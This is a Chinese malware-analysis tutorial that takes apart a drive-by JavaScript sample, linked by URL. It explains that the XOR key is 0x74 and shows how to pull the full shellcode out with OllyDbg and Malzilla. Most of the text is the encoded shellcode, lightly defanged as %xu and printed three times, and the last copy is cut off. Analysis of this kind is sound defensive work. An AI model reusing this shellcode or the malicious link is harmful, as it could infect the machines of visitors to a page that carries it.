呃…所谓特辑…就是额外的解密…其实是老物…但玩了新花样…

特辑>http://www.sb8456.cn/a1/xmybrx.js

很多人看到那些2121..0021…就去用21密钥…

但实际上不是的..

为防止误报,因此请将以下所有SHELLCODE替换为%u

JavaScript代码
  1. var nndx="%"+"u"+"9"+"0"+"9"+"0"+"%"+"u"+"9"+"0"+"9"+"0";   
  2. var mybrmybr=unescape(nndx+"%xuE1D9%xu34D9%xu5824%xu5858%xu3358%xuB3DB%xu031C%xu31C3%xu66C9%xuE981%xuFA50%xu3080%xu4074%xuFAE2%xu429C%xu7477%xu1C74%xu5474%xu7474%xu741E%xuA48B%xu74CD%xu7464%xuFF74%xu9F8C%xu2A71%xuD087%xuA48B%xu829C%xu8B8B%xu9C8B%xu7749%xu7474%xu8CFF%xu4C9C%xu7474%xu9C74%xu7539%xu7474%xu329C%xu7474%xu9C74%xu77AF%xu7474%xu8CFF%xu569C%xu7474%xu9C74%xu7530%xu7474%xu449C%xu7474%xu9C74%xu77FD%xu7474%xu8CFF%xu789C%xu7474%xu9C74%xu7515%xu7474%xu6E9C%xu7474%xu9F74%xu272C%xuA8FF%xu1E27%xu1C34%xu6474%xu7474%xu9C23%xu76C5%xu7474%xu919C%xu7474%xu2C74%xu27B7%xuA8FF%xu1E27%xu1C54%xu6474%xu7474%xu9C23%xu76ED%xu7474%xuB99C%xu7474%xu2C74%xu23B7%xu489C%xu7470%xuFF74%xu478C%xu3DBD%xuB447%xuB7C4%xu8688%xuF9DA%xu8B33%xuB72B%xu4A2F%xu73B2%xu4ACC%xu2BFD%xu1275%xuB34A%xu7133%xu948B%xu9DB7%xu70E1%xu7474%xuF52F%xu6098%xu7475%xuFF74%xu4AA0%xu76B3%xu1917%xu5410%xuB34A%xu7036%xu175B%xu5654%xuB6F7%xu477C%xu24B4%xu1C24%xu7570%xu7474%xu2726%xu9C24%xu77B5%xu7474%xuA48B%xu88FF%xuB3FF%xuB4F7%xu4A7C%xu6CFE%xuAFF0%xu7700%xu9F34%xu4A82%xu74B2%xu4756%xu4AA6%xu24FC%xuF775%xu2098%xuB447%xuAF47%xuB8FF%xu8CF7%xu0920%xu4A7D%xu68FD%xuF775%xu70B4%xu869F%xuB8FF%xuADFF%xuB7F7%xu4764%xu4AB4%xu37B3%xu7558%xu7474%xu2574%xu2427%xu2424%xu2424%xu2324%xu9C24%xu774D%xu7474%xu6D9C%xu7474%xu1074%xu70D5%xu7474%xuF974%xu14D4%xu8B8B%xu9C8B%xu7743%xu7474%xuAF47%xu2727%xu2727%xuA48B%xu4CF4%xuF49C%xu9D4C%xu7B01%xu0CF5%xuE471%xuE4E4%xu00E4%xu2172%xu98FF%xu34F9%xu8B71%xu9C94%xu8B5A%xu8B8B%xu9CB7%xu8B5C%xu8B8B%xu65CC%xu7075%xuB6F4%xu7478%xu6F9C%xu8B8B%xu478B%xu24B4%xu9C20%xu7420%xu7474%xu9C24%xu76FF%xu7474%xuA48B%xuF442%xu5048%xu0374%xu9C7E%xu7635%xu7474%xu8B47%xu8B23%xu9CA4%xu758F%xu7474%xu8B1C%xu7474%xu8B74%xu9CA4%xu8A9C%xu8B8B%xu2327%xu4722%xu24B4%xu9C20%xu746A%xu7474%xu9C24%xu7621%xu7474%xuA48B%xuF442%xu5048%xu0374%xu9C7E%xu767F%xu7474%xu8B47%xu8B23%xu2CA4%xu2B2A%xuB72F%xu769F%xuB72C%xu8D9C%xu8B8B%xu228B%xuF723%xu7C98%xu88FF%xu7C1E%xu4A23%xu038B%xu9C60%xu7629%xu7474%xuA48B%xu88FF%xu151C%xu1119%xu1C74%xu313D%xu0632%xu80FF%xu7CCD%xu7474%xu8774%xu01D2%xu1E5B%xu4A74%xu008B%xu5450%xu509C%xu7476%xu8B74%xuFFA4%xu9C8C%xu75BF%xu7474%xuA48B%xu8C4F%xu7C00%xuFF42%xu5030%xu4A54%xu748B%xu8B4A%xu5000%xu9C68%xu759B%xu7474%xuA48B%xuB0F7%xu2B64%xuCC2A%xu7475%xu7474%xu1CB7%xu1A1B%xu7474%xu011C%xu1806%xu9F19%xuF961%xu5030%xu2470%xu569C%xu8B8A%xu248B%xu3E9C%xu7476%xu9D74%xu8A96%xu8B8B%xu929C%xu8B8B%xuF78B%xu7CB0%xu1EB7%xu1C18%xu001A%xu1810%xu619F%xu30F9%xu7050%xu9C24%xu898F%xu8B8B%xu9C24%xu7657%xu7474%xuCF9D%xu8B8A%xu9C8B%xu8B92%xu8B8B%xuB0F7%xuB77C%xu471C%xu7446%xu1C74%xu0701%xu0611%xu619F%xu30F9%xu7050%xu9C24%xu89A5%xu8B8B%xu9C24%xu758D%xu7474%xuE59D%xu8B8A%xu9C8B%xu8B92%xu8B8B%xuB0F7%xuB77C%xu171C%xu0302%xu1C74%xu1C07%xu1B10%xu619F%xu30F9%xu7050%xu9C24%xu89D3%xu8B8B%xu9C24%xu75BB%xu7474%xu139D%xu8B8A%xu9C8B%xu8B92%xu8B8B%xuB0F7%xuB77C%xu021C%xu0C13%xu9F74%xuF961%xu5030%xu2470%xuF69C%xu8B89%xu248B%xuDE9C%xu7475%xu9D74%xu8A36%xu8B8B%xu929C%xu8B8B%xuF78B%xu70B0%xu9CB7%xu75DF%xu7474%xu6F1C%xu32B2%xu240D%xuB29C%xu7475%xuF774%xu7CB0%xu9CB7%xu75E3%xu7474%xu981C%xu77E3%xu2478%xuC69C%xu7475%xuF774%xu7CB0%xu9CB7%xu75F7%xu7474%xuDE1C%xu7988%xu2408%xuEA9C%xu7475%xuF774%xu7CB0%xu9CB7%xu751B%xu7474%xu991C%xu9B22%xu2442%xuFE9C%xu7475%xuF774%xu7CB0%xu9CB7%xu752F%xu7474%xu841C%xu70FE%xu242B%xu029C%xu7475%xuF774%xu7CB0%xu9CB7%xu8A83%xu8B8B%xu0C1C%xuAF1C%xu2468%xu169C%xu7475%xuF774%xu7CB0%xu9CB7%xu7547%xu7474%xu9B1C%xu94BA%xu2414%xu3A9C%xu7475%xuF774%xu7CB0%xu9CB7%xu756B%xu7474%xuC41C%xu593D%xu24AF%xu4E9C%xu7475%xuF774%xu7CB0%xu9CB7%xu8B42%xu8B8B%xuDF1C%xuEF2A%xu246A%xu529C%xu7475%xuF774%xu7CB0%xu9CB7%xu8AD3%xu8B8B%xu2D1C%xuF5E3%xu2476%xu669C%xu7475%xuF774%xu7CB0%xu9CB7%xu7497%xu7474%xu0A1C%xu96AC%xu2407%xu8A9C%xu7474%xuF774%xu7CB0%xu9CB7%xu74BB%xu7474%xuEA1C%xuCF8D%xu2441%xu9E9C%xu7474%xuF774%xu7CB0%xu9CB7%xu8AE6%xu8B8B%xu231C%xuC1D4%xu24CF%xuA29C%xu7474%xuF774%xu7CB0%xu9CB7%xu8A0A%xu8B8B%xu6E1C%xu6A0E%xu2476%xuB69C%xu7474%xuF774%xu7CB0%xu9CB7%xu8A1E%xu8B8B%xu941C%xu442F%xu24E0%xuDA9C%xu7474%xuF774%xu7CB0%xu9CB7%xu8A22%xu8B8B%xuE31C%xu96BD%xu24D7%xuEE9C%xu7474%xuF774%xu7CB0%xu9CB7%xu8A36%xu8B8B%xu1C1C%xuB150%xu24C7%xuF29C%xu7474%xuF774%xu7CB0%xu9CB7%xu7423%xu7474%xu061C%xuC78A%xu2462%xu069C%xu7474%xuF774%xu7CB0%xu9CB7%xu8A30%xu8B8B%xu679F%xu111E%xu9C24%xu8F83%xu8B8B%xu9C24%xu8ADF%xu8B8B%xuC39D%xu8B88%xu9C8B%xu8B9C%xu8B8B%xu9CB7%xu89DD%xu8B8B%xu3B1C%xu3B9B%xu2471%xu4A9C%xu7474%xuF774%xu7CB0%xu9CB7%xu747B%xu7474%xuFA1C%xu7A3A%xu2498%xu5E9C%xu7474%xuF774%xu7CB0%xu47B7%xu10B4%xu34FF%xuF144%xu0CB4%xu4A64%xu34FF%xu4A78%xu04FF%xuD968%xuFF4A%xu7C34%xu9FB7%xu4A7F%xu34FF%xuF740%xu08B4%xuFF4A%xu4834%xu14B7%xuFF42%xu5018%xu4250%xu31FF%xu4248%xu20FF%xu0C71%xuA177%xuFF4A%xu6C3E%xuFF4A%xu542E%xuA977%xu4F97%xu4A3D%xu40FF%xu77FF%xu4781%xu478B%xu88B4%xuF0D8%xu00B4%xuB573%xu79BB%xu8C77%xu809F%xu4F42%xu5008%xu015C%xu4AAB%xu2EFF%xu7750%xu12A9%xuFF4A%xu3F78%xuFF4A%xu682E%xuA977%xuFF4A%xuFF70%xuB177%xuFD42%xu5030%xu1568%xu9CB7%xu8F12%xu8B8B%xu001C%xu0400%xu5B4E%xu105B%xu035A%xu0C1D%xu0303%xu175A%xu191B%xu1A5B%xu0311%xu155B%xu5A45%xu0717%xu7407%xu7474%xu7474%xu7474%xu7474%xu1C74%xu0000%xu4E04%xu5B5B%xu0303%xu5A03%xu1516%xu101D%xu5A01%xu1B17%xu5B19%xu1100%xu0007%xu115A%xu110C%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu0021");  

OD调试…是个好办法…

关键是提取Shellcode..

如果你提取像下面那样…

Shellcode代码
  1. %xuE1D9%xu34D9%xu5824%xu5858%xu3358%xuB3DB%xu031C%xu31C3%xu66C9%xuE981%xuFA50%xu3080%xu4074%xuFAE2%xu429C%xu7477%xu1C74%xu5474%xu7474%xu741E%xuA48B%xu74CD%xu7464%xuFF74%xu9F8C%xu2A71%xuD087%xuA48B%xu829C%xu8B8B%xu9C8B%xu7749%xu7474%xu8CFF%xu4C9C%xu7474%xu9C74%xu7539%xu7474%xu329C%xu7474%xu9C74%xu77AF%xu7474%xu8CFF%xu569C%xu7474%xu9C74%xu7530%xu7474%xu449C%xu7474%xu9C74%xu77FD%xu7474%xu8CFF%xu789C%xu7474%xu9C74%xu7515%xu7474%xu6E9C%xu7474%xu9F74%xu272C%xuA8FF%xu1E27%xu1C34%xu6474%xu7474%xu9C23%xu76C5%xu7474%xu919C%xu7474%xu2C74%xu27B7%xuA8FF%xu1E27%xu1C54%xu6474%xu7474%xu9C23%xu76ED%xu7474%xuB99C%xu7474%xu2C74%xu23B7%xu489C%xu7470%xuFF74%xu478C%xu3DBD%xuB447%xuB7C4%xu8688%xuF9DA%xu8B33%xuB72B%xu4A2F%xu73B2%xu4ACC%xu2BFD%xu1275%xuB34A%xu7133%xu948B%xu9DB7%xu70E1%xu7474%xuF52F%xu6098%xu7475%xuFF74%xu4AA0%xu76B3%xu1917%xu5410%xuB34A%xu7036%xu175B%xu5654%xuB6F7%xu477C%xu24B4%xu1C24%xu7570%xu7474%xu2726%xu9C24%xu77B5%xu7474%xuA48B%xu88FF%xuB3FF%xuB4F7%xu4A7C%xu6CFE%xuAFF0%xu7700%xu9F34%xu4A82%xu74B2%xu4756%xu4AA6%xu24FC%xuF775%xu2098%xuB447%xuAF47%xuB8FF%xu8CF7%xu0920%xu4A7D%xu68FD%xuF775%xu70B4%xu869F%xuB8FF%xuADFF%xuB7F7%xu4764%xu4AB4%xu37B3%xu7558%xu7474%xu2574%xu2427%xu2424%xu2424%xu2324%xu9C24%xu774D%xu7474%xu6D9C%xu7474%xu1074%xu70D5%xu7474%xuF974%xu14D4%xu8B8B%xu9C8B%xu7743%xu7474%xuAF47%xu2727%xu2727%xuA48B%xu4CF4%xuF49C%xu9D4C%xu7B01%xu0CF5%xuE471%xuE4E4%xu00E4%xu2172%xu98FF%xu34F9%xu8B71%xu9C94%xu8B5A%xu8B8B%xu9CB7%xu8B5C%xu8B8B%xu65CC%xu7075%xuB6F4%xu7478%xu6F9C%xu8B8B%xu478B%xu24B4%xu9C20%xu7420%xu7474%xu9C24%xu76FF%xu7474%xuA48B%xuF442%xu5048%xu0374%xu9C7E%xu7635%xu7474%xu8B47%xu8B23%xu9CA4%xu758F%xu7474%xu8B1C%xu7474%xu8B74%xu9CA4%xu8A9C%xu8B8B%xu2327%xu4722%xu24B4%xu9C20%xu746A%xu7474%xu9C24%xu7621%xu7474%xuA48B%xuF442%xu5048%xu0374%xu9C7E%xu767F%xu7474%xu8B47%xu8B23%xu2CA4%xu2B2A%xuB72F%xu769F%xuB72C%xu8D9C%xu8B8B%xu228B%xuF723%xu7C98%xu88FF%xu7C1E%xu4A23%xu038B%xu9C60%xu7629%xu7474%xuA48B%xu88FF%xu151C%xu1119%xu1C74%xu313D%xu0632%xu80FF%xu7CCD%xu7474%xu8774%xu01D2%xu1E5B%xu4A74%xu008B%xu5450%xu509C%xu7476%xu8B74%xuFFA4%xu9C8C%xu75BF%xu7474%xuA48B%xu8C4F%xu7C00%xuFF42%xu5030%xu4A54%xu748B%xu8B4A%xu5000%xu9C68%xu759B%xu7474%xuA48B%xuB0F7%xu2B64%xuCC2A%xu7475%xu7474%xu1CB7%xu1A1B%xu7474%xu011C%xu1806%xu9F19%xuF961%xu5030%xu2470%xu569C%xu8B8A%xu248B%xu3E9C%xu7476%xu9D74%xu8A96%xu8B8B%xu929C%xu8B8B%xuF78B%xu7CB0%xu1EB7%xu1C18%xu001A%xu1810%xu619F%xu30F9%xu7050%xu9C24%xu898F%xu8B8B%xu9C24%xu7657%xu7474%xuCF9D%xu8B8A%xu9C8B%xu8B92%xu8B8B%xuB0F7%xuB77C%xu471C%xu7446%xu1C74%xu0701%xu0611%xu619F%xu30F9%xu7050%xu9C24%xu89A5%xu8B8B%xu9C24%xu758D%xu7474%xuE59D%xu8B8A%xu9C8B%xu8B92%xu8B8B%xuB0F7%xuB77C%xu171C%xu0302%xu1C74%xu1C07%xu1B10%xu619F%xu30F9%xu7050%xu9C24%xu89D3%xu8B8B%xu9C24%xu75BB%xu7474%xu139D%xu8B8A%xu9C8B%xu8B92%xu8B8B%xuB0F7%xuB77C%xu021C%xu0C13%xu9F74%xuF961%xu5030%xu2470%xuF69C%xu8B89%xu248B%xuDE9C%xu7475%xu9D74%xu8A36%xu8B8B%xu929C%xu8B8B%xuF78B%xu70B0%xu9CB7%xu75DF%xu7474%xu6F1C%xu32B2%xu240D%xuB29C%xu7475%xuF774%xu7CB0%xu9CB7%xu75E3%xu7474%xu981C%xu77E3%xu2478%xuC69C%xu7475%xuF774%xu7CB0%xu9CB7%xu75F7%xu7474%xuDE1C%xu7988%xu2408%xuEA9C%xu7475%xuF774%xu7CB0%xu9CB7%xu751B%xu7474%xu991C%xu9B22%xu2442%xuFE9C%xu7475%xuF774%xu7CB0%xu9CB7%xu752F%xu7474%xu841C%xu70FE%xu242B%xu029C%xu7475%xuF774%xu7CB0%xu9CB7%xu8A83%xu8B8B%xu0C1C%xuAF1C%xu2468%xu169C%xu7475%xuF774%xu7CB0%xu9CB7%xu7547%xu7474%xu9B1C%xu94BA%xu2414%xu3A9C%xu7475%xuF774%xu7CB0%xu9CB7%xu756B%xu7474%xuC41C%xu593D%xu24AF%xu4E9C%xu7475%xuF774%xu7CB0%xu9CB7%xu8B42%xu8B8B%xuDF1C%xuEF2A%xu246A%xu529C%xu7475%xuF774%xu7CB0%xu9CB7%xu8AD3%xu8B8B%xu2D1C%xuF5E3%xu2476%xu669C%xu7475%xuF774%xu7CB0%xu9CB7%xu7497%xu7474%xu0A1C%xu96AC%xu2407%xu8A9C%xu7474%xuF774%xu7CB0%xu9CB7%xu74BB%xu7474%xuEA1C%xuCF8D%xu2441%xu9E9C%xu7474%xuF774%xu7CB0%xu9CB7%xu8AE6%xu8B8B%xu231C%xuC1D4%xu24CF%xuA29C%xu7474%xuF774%xu7CB0%xu9CB7%xu8A0A%xu8B8B%xu6E1C%xu6A0E%xu2476%xuB69C%xu7474%xuF774%xu7CB0%xu9CB7%xu8A1E%xu8B8B%xu941C%xu442F%xu24E0%xuDA9C%xu7474%xuF774%xu7CB0%xu9CB7%xu8A22%xu8B8B%xuE31C%xu96BD%xu24D7%xuEE9C%xu7474%xuF774%xu7CB0%xu9CB7%xu8A36%xu8B8B%xu1C1C%xuB150%xu24C7%xuF29C%xu7474%xuF774%xu7CB0%xu9CB7%xu7423%xu7474%xu061C%xuC78A%xu2462%xu069C%xu7474%xuF774%xu7CB0%xu9CB7%xu8A30%xu8B8B%xu679F%xu111E%xu9C24%xu8F83%xu8B8B%xu9C24%xu8ADF%xu8B8B%xuC39D%xu8B88%xu9C8B%xu8B9C%xu8B8B%xu9CB7%xu89DD%xu8B8B%xu3B1C%xu3B9B%xu2471%xu4A9C%xu7474%xuF774%xu7CB0%xu9CB7%xu747B%xu7474%xuFA1C%xu7A3A%xu2498%xu5E9C%xu7474%xuF774%xu7CB0%xu47B7%xu10B4%xu34FF%xuF144%xu0CB4%xu4A64%xu34FF%xu4A78%xu04FF%xuD968%xuFF4A%xu7C34%xu9FB7%xu4A7F%xu34FF%xuF740%xu08B4%xuFF4A%xu4834%xu14B7%xuFF42%xu5018%xu4250%xu31FF%xu4248%xu20FF%xu0C71%xuA177%xuFF4A%xu6C3E%xuFF4A%xu542E%xuA977%xu4F97%xu4A3D%xu40FF%xu77FF%xu4781%xu478B%xu88B4%xuF0D8%xu00B4%xuB573%xu79BB%xu8C77%xu809F%xu4F42%xu5008%xu015C%xu4AAB%xu2EFF%xu7750%xu12A9%xuFF4A%xu3F78%xuFF4A%xu682E%xuA977%xuFF4A%xuFF70%xuB177%xuFD42%xu5030%xu1568%xu9CB7%xu8F12%xu8B8B%xu001C%xu0400%xu5B4E%xu105B%xu035A%xu0C1D%xu0303%xu175A%xu191B%xu1A5B%xu0311%xu155B%xu5A45%xu0717%xu7407%xu7474%xu7474%xu7474%xu7474%xu1C74%xu0000%xu4E04%xu5B5B%xu0303%xu5A03%xu1516%xu101D%xu5A01%xu1B17%xu5B19%xu1100%xu0007%xu115A%xu110C%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu0021  

抱歉…你调试到下面时

00405016    8030 74         xor     byte ptr [eax], 74               ; 其实你看这里就知道XOR是74了

OD会提示你:调试的程序无法处理异常

然后就无情的飘飞了

那么..问题出在哪里?

答案就是..提取的Shellcode不全面…你应该将前面的

var nndx="%"+"u"+"9"+"0"+"9"+"0"+"%"+"u"+"9"+"0"+"9"+"0";  

一起纳入Shellcode范围..

我是很偷懒的…不想手动变量相加

你把以下东西放入Malzilla执行即可(或者麻烦些,把document.write换成alert加上<script>标签到浏览器执行亦可)呃..此时就可以得到Shellcode代码

JavaScript代码
  1. var nndx="%"+"u"+"9"+"0"+"9"+"0"+"%"+"u"+"9"+"0"+"9"+"0";     
  2. document.write(nndx+"%xuE1D9%xu34D9%xu5824%xu5858%xu3358%xuB3DB%xu031C%xu31C3%xu66C9%xuE981%xuFA50%xu3080%xu4074%xuFAE2%xu429C%xu7477%xu1C74%xu5474%xu7474%xu741E%xuA48B%xu74CD%xu7464%xuFF74%xu9F8C%xu2A71%xuD087%xuA48B%xu829C%xu8B8B%xu9C8B%xu7749%xu7474%xu8CFF%xu4C9C%xu7474%xu9C74%xu7539%xu7474%xu329C%xu7474%xu9C74%xu77AF%xu7474%xu8CFF%xu569C%xu7474%xu9C74%xu7530%xu7474%xu449C%xu7474%xu9C74%xu77FD%xu7474%xu8CFF%xu789C%xu7474%xu9C74%xu7515%xu7474%xu6E9C%xu7474%xu9F74%xu272C%xuA8FF%xu1E27%xu1C34%xu6474%xu7474%xu9C23%xu76C5%xu7474%xu919C%xu7474%xu2C74%xu27B7%xuA8FF%xu1E27%xu1C54%xu6474%xu7474%xu9C23%xu76ED%xu7474%xuB99C%xu7474%xu2C74%xu23B7%xu489C%xu7470%xuFF74%xu478C%xu3DBD%xuB447%xuB7C4%xu8688%xuF9DA%xu8B33%xuB72B%xu4A2F%xu73B2%xu4ACC%xu2BFD%xu1275%xuB34A%xu7133%xu948B%xu9DB7%xu70E1%xu7474%xuF52F%xu6098%xu7475%xuFF74%xu4AA0%xu76B3%xu1917%xu5410%xuB34A%xu7036%xu175B%xu5654%xuB6F7%xu477C%xu24B4%xu1C24%xu7570%xu7474%xu2726%xu9C24%xu77B5%xu7474%xuA48B%xu88FF%xuB3FF%xuB4F7%xu4A7C%xu6CFE%xuAFF0%xu7700%xu9F34%xu4A82%xu74B2%xu4756%xu4AA6%xu24FC%xuF775%xu2098%xuB447%xuAF47%xuB8FF%xu8CF7%xu0920%xu4A7D%xu68FD%xuF775%xu70B4%xu869F%xuB8FF%xuADFF%xuB7F7%xu4764%xu4AB4%xu37B3%xu7558%xu7474%xu2574%xu2427%xu2424%xu2424%xu2324%xu9C24%xu774D%xu7474%xu6D9C%xu7474%xu1074%xu70D5%xu7474%xuF974%xu14D4%xu8B8B%xu9C8B%xu7743%xu7474%xuAF47%xu2727%xu2727%xuA48B%xu4CF4%xuF49C%xu9D4C%xu7B01%xu0CF5%xuE471%xuE4E4%xu00E4%xu2172%xu98FF%xu34F9%xu8B71%xu9C94%xu8B5A%xu8B8B%xu9CB7%xu8B5C%xu8B8B%xu65CC%xu7075%xuB6F4%xu7478%xu6F9C%xu8B8B%xu478B%xu24B4%xu9C20%xu7420%xu7474%xu9C24%xu76FF%xu7474%xuA48B%xuF442%xu5048%xu0374%xu9C7E%xu7635%xu7474%xu8B47%xu8B23%xu9CA4%xu758F%xu7474%xu8B1C%xu7474%xu8B74%xu9CA4%xu8A9C%xu8B8B%xu2327%xu4722%xu24B4%xu9C20%xu746A%xu7474%xu9C24%xu7621%xu7474%xuA48B%xuF442%xu5048%xu0374%xu9C7E%xu767F%xu7474%xu8B47%xu8B23%xu2CA4%xu2B2A%xuB72F%xu769F%xuB72C%xu8D9C%xu8B8B%xu228B%xuF723%xu7C98%xu88FF%xu7C1E%xu4A23%xu038B%xu9C60%xu7629%xu7474%xuA48B%xu88FF%xu151C%xu1119%xu1C74%xu313D%xu0632%xu80FF%xu7CCD%xu7474%xu8774%xu01D2%xu1E5B%xu4A74%xu008B%xu5450%xu509C%xu7476%xu8B74%xuFFA4%xu9C8C%xu75BF%xu7474%xuA48B%xu8C4F%xu7C00%xuFF42%xu5030%xu4A54%xu748B%xu8B4A%xu5000%xu9C68%xu759B%xu7474%xuA48B%xuB0F7%xu2B64%xuCC2A%xu7475%xu7474%xu1CB7%xu1A1B%xu7474%xu011C%xu1806%xu9F19%xuF961%xu5030%xu2470%xu569C%xu8B8A%xu248B%xu3E9C%xu7476%xu9D74%xu8A96%xu8B8B%xu929C%xu8B8B%xuF78B%xu7CB0%xu1EB7%xu1C18%xu001A%xu1810%xu619F%xu30F9%xu7050%xu9C24%xu898F%xu8B8B%xu9C24%xu7657%xu7474%xuCF9D%xu8B8A%xu9C8B%xu8B92%xu8B8B%xuB0F7%xuB77C%xu471C%xu7446%xu1C74%xu0701%xu0611%xu619F%xu30F9%xu7050%xu9C24%xu89A5%xu8B8B%xu9C24%xu758D%xu7474%xuE59D%xu8B8A%xu9C8B%xu8B92%xu8B8B%xuB0F7%xuB77C%xu171C%xu0302%xu1C74%xu1C07%xu1B10%xu619F%xu30F9%xu7050%xu9C24%xu89D3%xu8B8B%xu9C24%xu75BB%xu7474%xu139D%xu8B8A%xu9C8B%xu8B92%xu8B8B%xuB0F7%xuB77C%xu021C%xu0C13%xu9F74%xuF961%xu5030%xu2470%xuF69C%xu8B89%xu248B%xuDE9C%xu7475%xu9D74%xu8A36%xu8B8B%xu929C%xu8B8B%xuF78B%xu70B0%xu9CB7%xu75DF%xu7474%xu6F1C%xu32B2%xu240D%xuB29C%xu7475%xuF774%xu7CB0%xu9CB7%xu75E3%xu7474%xu981C%xu77E3%xu2478%xuC69C%xu7475%xuF774%xu7CB0%xu9CB7%xu75F7%xu7474%xuDE1C%xu7988%xu2408%xuEA9C%xu7475%xuF774%xu7CB0%xu9CB7%xu751B%xu7474%xu991C%xu9B22%xu2442%xuFE9C%xu7475%xuF774%xu7CB0%xu9CB7%xu752F%xu7474%xu841C%xu70FE%xu242B%xu029C%xu7475%xuF774%xu7CB0%xu9CB7%xu8A83%xu8B8B%xu0C1C%xuAF1C%xu2468%xu169C%xu7475%xuF774%xu7CB0%xu9CB7%xu7547%xu7474%xu9B1C%xu94BA%xu2414%xu3A9C%xu7475%xuF774%xu7CB0%xu9CB7%xu756B%xu7474%xuC41C%xu593D%xu24AF%xu4E9C%xu7475%xuF774%xu7CB0%xu9CB7%xu8B42%xu8B8B%xuDF1C%xuEF2A%xu246A%xu529C%xu7475%xuF774%xu7CB0%xu9CB7%xu8AD3%xu8B8B%xu2D1C%xuF5E3%xu2476%xu669C%xu7475%xuF774%xu7CB0%xu9CB7%xu7497%xu7474%xu0A1C%xu96AC%xu2407%xu8A9C%xu7474%xuF774%xu7CB0%xu9CB7%xu74BB%xu7474%xuEA1C%xuCF8D%xu2441%xu9E9C%xu7474%xuF774%xu7CB0%xu9CB7%xu8AE6%xu8B8B%xu231C%xuC1D4%xu24CF%xuA29C%xu7474%xuF774%xu7CB0%xu9CB7%xu8A0A%xu8B8B%xu6E1C%xu6A0E%xu2476%xuB69C%xu7474%xuF774%xu7CB0%xu9CB7%xu8A1E%xu8B8B%xu941C%xu442F%xu24E0%xuDA9C%xu7474%xuF774%xu7CB0%xu9CB7%xu8A22%xu8B8B%xuE31C%xu96BD%xu24D7%xuEE9C%xu7474%xuF774%xu7CB0%xu9CB7%xu8A36%xu8B8B%xu1C1C%xuB150%xu24C7%xuF29C%xu7474%xuF774%xu7CB0%xu9CB7%xu7423%xu7474%xu061C%xuC78A%xu2462%xu069C%xu7474%xuF774%xu7CB0%xu9CB7%xu8A30%xu8B8B%xu679F%xu111E%xu9C24%xu8F83%xu8B8B%xu9C24%xu8ADF%xu8B8B%xuC39D%xu8B88%xu9C8B%xu8B9C%xu8B8B%xu9CB7%xu89DD%xu8B8B%xu3B1C%xu3B9B%xu2471%xu4A9C%xu7474%xuF774%xu7CB0%xu9CB7%xu747B%xu7474%xuFA1C%xu7A3A%xu2498%xu5E9C%xu7474%xuF774%xu7CB0%xu47B7%xu10B4%xu34FF%xuF144%xu0CB4%xu4A64%xu34FF%xu4A78%xu04FF%xuD968%xuFF4A%xu7C34%xu9FB7%xu4A7F%xu34FF%xuF740%xu08B4%xuFF4A%xu4834%xu14B7%xuFF42%xu5018%xu4250%xu31FF%xu4248%xu20FF%xu0C71%xuA177%xuFF4A%xu6C3E%xuFF4A%xu542E%xuA977%xu4F97%xu4A3D%xu40FF%xu77FF%xu4781%xu478B%xu88B4%xuF0D8%xu00B4%xuB573%xu79BB%xu8C77%xu809F%xu4F42%xu5008%xu015C%xu4AAB%xu2EFF%xu7750%xu12A9%xuFF4A%xu3F78%xuFF4A%xu682E%xuA977%xuFF4A%xuFF70%xuB177%xuFD42%xu5030%xu1568%xu9CB7%xu8F12%xu8B8B%xu001C%xu0400%xu5B4E%xu105B%xu035A%xu0C1D%xu0303%xu175A%xu191B%xu1A5B%xu0311%xu155B%xu5A45%xu0717%xu7407%xu7474%xu7474%xu7474%xu7474%xu1C74%xu0000%xu4E04%xu5B5B%xu0303%xu5A03%xu1516%xu101D%xu5A01%xu1B17%xu5B19%xu1100%xu0007%xu115A%xu110C%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu2121%xu0021");  

 可得到:

Shellcode代码
  1. %xu9090%xu9090%xuE1D9%xu34D9%xu5824%xu5858%xu3358%xuB3DB%xu031C%xu31C3%xu66C9%xuE981%xuFA50%xu3080%xu4074%xuFAE2%xu429C%xu7477%xu1C74%xu5474%xu7474%xu741E%xuA48B%xu74CD%xu7464%xuFF74%xu9F8C%xu2A71%xuD087%xuA48B%xu829C%xu8B8B%xu9C8B%xu7749%xu7474%xu8CFF%xu4C9C%xu7474%xu9C74%xu7539%xu7474%xu329C%xu7474%xu9C74%xu77AF%xu7474%xu8CFF%xu569C%xu7474%xu9C74%xu7530%xu7474%xu449C%xu7474%xu9C74%xu77FD%xu7474%xu8CFF%xu789C%xu7474%xu9C74%xu7515%xu7474%xu6E9C%xu7474%xu9F74%xu272C%xuA8FF%xu1E27%xu1C34%xu6474%xu7474%xu9C23%xu76C5%xu7474%xu919C%xu7474%xu2C74%xu27B7%xuA8FF%xu1E27%xu1C54%xu6474%xu7474%xu9C23%xu76ED%xu7474%xuB99C%xu7474%xu2C74%xu23B7%xu489C%xu7470%xuFF74%xu478C%xu3DBD%xuB447%xuB7C4%xu8688%xuF9DA%xu8B33%xuB72B%xu4A2F%xu73B2%xu4ACC%xu2BFD%xu1275%xuB34A%xu7133%xu948B%xu9DB7%xu70E1%xu7474%xuF52F%xu6098%xu7475%xuFF74%xu4AA0%xu76B3%xu1917%xu5410%xuB34A%xu7036%xu175B%xu5654%xuB6F7%xu477C%xu24B4%xu1C24%xu7570%xu7474%xu2726%xu9C24%xu77B5%xu7474%xuA48B%xu88FF%xuB3FF%xuB4F7%xu4A7C%xu6CFE%xuAFF0%xu7700%xu9F34%xu4A82%xu74B2%xu4756%xu4AA6%xu24FC%xuF775%xu2098%xuB447%xuAF47%xuB8FF%xu8CF7%xu0920%xu4A7D%xu68FD%xuF775%xu70B4%xu869F%xuB8FF%xuADFF%xuB7F7%xu4764%xu4AB4%xu37B3%xu7558%xu7474%xu2574%xu2427%xu2424%xu2424%xu2324%xu9C24%xu774D%xu7474%xu6D9C%xu7474%xu1074%xu70D5